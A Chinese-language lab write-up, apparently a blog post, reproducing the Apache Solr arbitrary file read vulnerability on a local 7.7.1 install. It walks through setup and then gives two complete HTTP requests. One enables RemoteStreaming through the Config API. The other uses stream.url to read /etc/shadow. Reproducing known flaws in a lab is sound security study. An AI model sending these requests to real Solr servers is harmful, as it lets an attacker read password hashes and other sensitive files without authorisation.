Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。Apache-Solr任意文件读取漏洞漏洞,攻击者可以在未授权的情况下读取目标服务器敏感文件和相关内容。
Apache Slor <=8.8.1(网上已有原版本,本次测试7.7.1版本,踩踩坑)
1.下载版本 wget https://archive.apache.org/dist/lucene/solr/7.7.1/ 到/usr/local
注:/usr/local 和/opt都是 用户级的程序目录
/usr/local:用户级的程序目录,可以理解为C:/Progrem Files/
/opt:可以理解为 D:/Software
2.将文件解压到 /usr/local
tar -zxvf solr-7.7.1.tgz -C /usr/local
cd /usr/local/solr-7.7.1/目录下
运行 bin /solr start -force ,可能出现报错,可查看该目录下熵池大小,3000基本没问题,报错也可正常启动
熵池大小不足,参考该链接解决:https://www.huaweicloud.com/articles/a1a36d35760149c8394c59f04b8893c7.html
启动成功后访问 http://ip+8983 端口,如下图环境已搭建成功。
首先利用Config API打开默认关闭的requestDispatcher.requestParsers.enableRemoteStreaming开关,然后进行文件读取。
注:默认情况下requestDispatcher.requestParsers.enableRemoteStreaming是关闭,攻击者并不能进行任意文件读取。
在/usr/local/solr-7.7.1/server/solr/ 新建目录ceshi
mkdir ceshi
将该路径[/usr/local/solr7.7.1/server/solr/configsets/_default/conf] 下所有文件拷贝到yy
cd /usr/local/solr7.7.1/server/solr/configsets/_default/conf
cp -r * /usr/local/solr-7.7.1/server/solr/ ceshi
名字最好和你新建的core一个名字 ceshi,建好如下图
3.获取core名称。 /solr/admin/cores?wt=json
4.通过solr config 的接口构造数据包,启用RemoteStreaming
POST /solr/ceshi/config HTTP/1.1
Host: 192.168.250.77:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 80
Content-Type: application/json
Connection: close
{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
返回以下内容为成功开启RemoteStreaming
HTTP/1.1 200 OK
Connection: close
Content-Type: text/plain;charset=utf-8
Content-Length: 150
{
"responseHeader":{
"status":0,
"QTime":3008},
"WARNING":"This response format is experimental. It is likely to change in the future."
5.构造数据包,利用stream.url 读取任意文件
POST /solr/ceshi/debug/dump?param=ContentStreams HTTP/1.1
Host: 192.168.250.77:8983
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Origin: http://192.168.250.77:8983
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.213.128:8983/solr/ceshi/config
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Connection: close
stream.url=file:///etc/shadow
多踩坑,多学习,多积累踩坑经验
参考:https://www.freebuf.com/vuls/266685.html